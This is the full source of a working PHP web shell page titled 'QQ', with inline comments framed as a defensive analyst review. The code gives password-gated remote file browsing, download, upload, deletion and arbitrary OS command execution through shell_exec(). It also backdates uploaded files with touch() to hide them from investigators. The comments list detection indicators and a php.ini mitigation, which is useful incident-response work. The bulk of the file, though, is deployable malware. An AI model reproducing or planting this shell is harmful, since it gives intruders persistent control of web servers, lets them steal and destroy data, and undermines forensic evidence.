<!DOCTYPE html><html><head><title>QQ</title><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">table{border-collapse:collapse;width:100%;font-family:Courier New;font-size:1.3vw;}a{text-decoration:none;cursor:pointer;}.content td{padding:8px;text-align:center;border-bottom:1px solid #ddd;}.content tr:hover{background-color:lightgray;}.contentheader th{position:sticky;top:0;z-index:1;background-color:dodgerblue;color:white;padding:15px 8px;text-align:center;border-bottom:1px solid #ddd;}.tableFixFooter{background-color:dodgerblue;color:white;padding:5px 8px;text-align:left;}.btn{border-radius:15px;background-color:white;color:black;border:1px solid dodgerblue;padding:1px 6px;font-family:Courier New;font-size:1.3vw;cursor:pointer;}.btn:hover{background-color:dodgerblue;color:white;}.nav{width:5%;text-align:left;vertical-align:top;}.nav-item{position:fixed;left:0;}.nav-item button{font-size:2vw;padding-left:10px;padding-right:15px;border-top-right-radius:20px;border-bottom-right-radius:20px;border:none;}.cui{vertical-align:top;padding-right:40px;}.cui input{background-color:white;border:1px solid gray;border-radius:20px;font-family:Courier New;font-size:1.3vw;padding:6px 10px;margin:5px 0px;display:block;width:100%}textarea{height:620px;border:1px solid #ddd; background-color:black;color:white;padding:10px;font-size:1.3vw;border-radius:20px;width:100%;resize:none;}.container{vertical-align:top;padding-right:20px;}.container #cwd {background-color:white;border:1px solid dodgerblue;border-radius:20px;font-family:Courier New;font-size:1.3vw;padding:5px 10px;margin:5px 0px;}.gui{height:600px;overflow:auto;border:1px solid #ddd;}.info{background-color:black;color:white;margin:0px 20px 0px 5%;border-bottom-left-radius:20px;border-bottom-right-radius:20px;font-family:Courier New;font-size:1.3vw;padding:4px 15px;text-align:center;}</style><script type="text/javascript">function 
SendRequest(a13,aa,aj){document.getElementById("postform").action=a13;document.getElementById("aa").value=aa;document.getElementById("aj").value=aj;document.getElementById("pwd").value="<?php echo $_POST["pwd"]?>";document.getElementById("postform").submit();}</script></head><body style="padding: 0px; margin: 0px"><?php
/*
 * Analyst annotation (defensive review; the code itself is unchanged).
 *
 * Single-file PHP web shell: a password-gated page offering directory
 * browsing, file view, download, upload, delete, and OS command execution
 * through shell_exec().
 *
 * Request interface visible in this file (usable for log / WAF / IDS matching):
 *   - Every action is submitted by the hidden multipart/form-data form
 *     "postform" as a POST carrying the fields pwd (password), aa (path),
 *     aj (command text) and ae (file upload).
 *   - The action is selected by the query parameter ab:
 *       ac = download, ad = upload, af = view file, ag = delete,
 *       ah = run command; with ab absent the directory listing is shown.
 *   - The page title is "QQ", and the password is checked by SHA-1 against
 *     the static hex digest in the comparison below; both are stable
 *     file-content indicators for this sample.
 *
 * Authentication is per request: no session value is read in the code
 * shown, and the inline SendRequest() script re-fills the pwd field from the
 * submitted $_POST["pwd"]. The operator password therefore travels in clear
 * text in each request body and is echoed into each response body, so
 * request-body captures or proxy logs can recover it during incident response.
 *
 * error_reporting(0) sets the PHP error reporting level to none for the
 * request.
 */
error_reporting(0);if(!isset($_SESSION))session_start();$a1="";$a2="";$host_address=$_SERVER['PHP_SELF'];if(!isset($_POST["pwd"]))$_POST["pwd"]="";
/* Gate: unless sha1() of the pwd field equals the hard-coded digest, only the login form is rendered. */
if(sha1($_POST["pwd"])!="7cf36e481895ea8866f394df16f8fb5b760d5ac7"){?><div class="info"><form action="<?php echo $host_address;?>" method="post"><input type="password" name="pwd"><input type="submit" name="" value="login"></form></div><?php }else{
/* Authenticated branch. $a2 is the working directory: the aa path itself when it is a directory, otherwise its dirname(); getcwd() when aa is empty. Backslashes are normalised to forward slashes. */
if($_POST["aa"]){if(is_dir($_POST["aa"]))$a2=$_POST["aa"];else $a2=dirname($_POST["aa"]);}else $a2=getcwd();$a2=str_replace('\\','/',$a2);
/* Dispatch on the ab query parameter. */
if($_GET["ab"]){switch($_GET["ab"]){
/* ac - download: sends the file named by aa as an attachment and exits. header() is called after page markup has already been emitted, so whether these headers take effect depends on output buffering (not visible here). */
case "ac":if($_POST["aa"]) $a3 = $_POST["aa"];else $a3 = "";header("Content-Type: application/octet-stream");header("Content-disposition:attachment;filename=\"".basename($a3)."\"");readfile($a3);exit; break;
/* ad - upload: copies the uploaded file ae into directory aa under its client-supplied name, then uses touch() to set the new file's timestamp to the mtime of that directory's parent ("/.."). Modification times of files dropped through this shell are therefore not trustworthy evidence; prefer inode change time, web-server logs and file-integrity baselines. */
case "ad":$a2 = $_POST["aa"];$a2 = str_replace('\\','/', $a2);$a4 = $a2 . "/" . $_FILES["ae"]["name"];if (copy($_FILES["ae"]["tmp_name"], $a4)) touch($a4, filemtime($a2 . 
"/..") );break;
/* af - view: reads the file at aa into $content when its size is above 0 and below 3000000 bytes; otherwise $content is empty. */
case "af":if(filesize($_POST["aa"])<3000000&&filesize($_POST["aa"])>0){$file=fopen($_POST["aa"],"r");while(!feof($file)){$content.=fgets($file);}fclose($file);}else $content="";break;
/* ag - delete: unlink() on the aa path with no further checks. */
case 'ag':unlink($_POST["aa"]);break;
/* ah - command execution: chdir() to $a2, then shell_exec() on the aj field. The same command is run a second time with "&& pwd" appended, and the tail of that output from the last newline is taken as the new working directory; plain pwd is run when the result is not a directory. Process telemetry should therefore show the PHP / web-server account spawning each shell command twice in quick succession. Mitigation: list shell_exec in the php.ini disable_functions directive where the application does not need it. */
case 'ah':chdir($a2);$aj=$_POST["aj"];$output=shell_exec($aj);$a2=shell_exec($aj."&& pwd");$a2=rtrim($a2,"\n");$len=strrpos($a2,"\n");$a2=substr($a2,$len);if(!is_dir($a2)){$a2=shell_exec("pwd");$a2=rtrim($a2,"\n");$len=strrpos($a2,"\n");$a2=substr($a2,$len);}$a2=str_replace('\\','/',$a2);break;default: break;}}$a2=str_replace("//",'/',$a2);?><div class="info"><span> IP: <?php echo $_SERVER[SERVER_ADDR]; ?> </span></div><table><tr><td class="nav"><div style="top: 50px;" class="nav-item"><button onclick="SendRequest('<?php echo $host_address;?>','<?php echo $a2;?>','')" style="color: black; background-color: dodgerblue;">G</button></div><div style="top: 100px;" class="nav-item"><button onclick="SendRequest('<?php echo $host_address;?>?ab=ah','<?php echo $a2;?>','')" style="color: white; background-color: black;">C</button></div></td><?php if($_GET["ab"] == "ah"){ ?><td class="cui"><div><input type="text" placeholder=">" id="realcmd" onkeydown="if(event.keyCode==13){SendRequest('<?php echo $host_address;?>?ab=ah','<?php echo $a2;?>',document.getElementById('realcmd').value);}" autofocus/></div><textarea><?php echo "\nCurrent Directory: ".$a2; echo "\n\nInputed Command: ".$aj; echo "\n\nResult: "; echo "\n\n".ltrim(htmlspecialchars($output)); ?></textarea> </td><?php } else { ?><td class="container"><?php if($_GET["ab"] == "af"){ ?><div><table><tr><td width="90%"><div id="cwd"><b>Current File: </b><?php echo $_POST["aa"];?></div></td><td width="10%" style="text-align: center"><input type="button" onclick="SendRequest('<?php echo $host_address;?>','<?php echo $a2;?>','')" value="Back" class="btn" style="padding: 5px 20px;"/></td></tr></table> </div><div style="padding-right: 20px;"><textarea><?php $content = htmlspecialchars($content); 
echo "\n".$content; ?></textarea></div><?php } else { ?><div><table><tr><td width="90%"><div id="cwd"><b>Current Directory: </b><?php echo $a2; ?></div></td><td width="10%" style="text-align: center"><input type="button" onclick="document.getElementById('file').click(); " value="Upload" class="btn" style="padding: 5px 20px;"/></td></tr></table> </div><div class="gui"><table style="overflow-y: scroll;" class="content"><tr class="contentheader"><th width="45%" style="text-align: left;">Name</th><th width="20%">Modified Date</th><th width="10%">Size</th><th width="10%">Property</th><th width="15%">Action</th></tr><?php /* Listing: entries of $a2 are split into directories ($a6) and files ($a7), each sorted, and rendered directories first. */ $a5 = dir($a2); $list = array(); $a6 = array(); $a7 = array(); if($a5){ while (($file = $a5->read()) !== false) { if(is_dir($a5->path.'/'.$file)) array_push($a6, $file); else array_push($a7, $file); } } sort($a6); sort($a7); for($i = 0; $i < count($a6); $i++) array_push($list, $a6[$i]); for($i = 0; $i < count($a7); $i++) array_push($list, $a7[$i]); for($index = 0; $index < count($list); $index++){ $file = $list[$index]; $a8 = ""; if($file == ".") $a8 = $a5->path; else if($file == ".."){ $len = strrpos($a2, "/"); $a8 = substr($a2, 0, $len); if($a8 == "") $a8 = "/"; } else $a8 = $a5->path.'/'.$file; if(is_dir($a8)){ $subdir = dir($a8); if(!$subdir) { $a8 = $a5->path; } else $subdir->close(); } ?> <tr> <td style="text-align: left; cursor: pointer;" onclick="SendRequest('<?php if(is_dir($a8)) echo $host_address; else echo $host_address.'?ab=af';?>','<?php echo $a8;?>','')"> <?php if(is_dir($a8)) echo "[" . $file . "]"; else echo $file;?> </td> <td> <?php echo date("m/d/Y H:i:s", filemtime($a8));?> </td><td style="text-align: right; padding-right: 30px;"><?php if(is_file($a8)){ $filesize = filesize($a8); if($filesize < 0) echo "2 G"; else if($filesize < pow(2, 10)) echo $filesize." B"; else if($filesize < pow(2, 20)) echo round($filesize / pow(2, 10)) . " K"; else if($filesize < pow(2, 30)) echo round($filesize / pow(2, 20)) . 
" M"; else echo round($filesize / pow(2, 30)) . " G"; } ?> </td> <td> <?php /* Renders the low nine permission bits of the entry as an rwx string. */ $a9 = substr(sprintf("%b",fileperms($a8)),-9); for($i = 0; $i < 9; $i++){ switch($i % 3){ case 0: $a9[$i] == '1' ? $a9[$i] = 'r' : $a9[$i] = '-'; break; case 1: $a9[$i] == '1' ? $a9[$i] = 'w' : $a9[$i] = '-'; break; default: $a9[$i] == '1' ? $a9[$i] = 'x' : $a9[$i] = '-'; break; } } echo $a9; ?> </td> <td> <span> <?php if(is_file($a8)){ ?> <button onclick="SendRequest('<?php echo $host_address;?>?ab=ac','<?php echo $a8;?>','')" class="btn">Down</button> <?php } ?> </span><span><?php if(is_file($a8)){ ?><button onclick="if(confirm('Do you really delete selected file?')) SendRequest('<?php echo $host_address;?>?ab=ag','<?php echo $a8;?>','');" class="btn">Del</button><?php } ?> </span></td></tr><?php } ?></table></div><div class="tableFixFooter">Total: <?php $dircnt = 0; if(count($a6) > 1) $dircnt = count($a6) - 2; else $dircnt = 0; echo $dircnt." Directories, "; echo count($a7)." Files"; ?> </div> <?php }?></td><?php } ?></tr></table><form action="" method="post" id="postform" enctype="multipart/form-data"><input type="hidden" name="aa" id="aa" /><input type="hidden" name="aj" id="aj" /><input type="hidden" name="pwd" id="pwd" /><input type="file" name="ae" id="file" value="Upload" style="display: none;" onchange="SendRequest('<?php echo $host_address;?>?ab=ad','<?php echo $a2;?>','');"></form><?php } ?></body></html>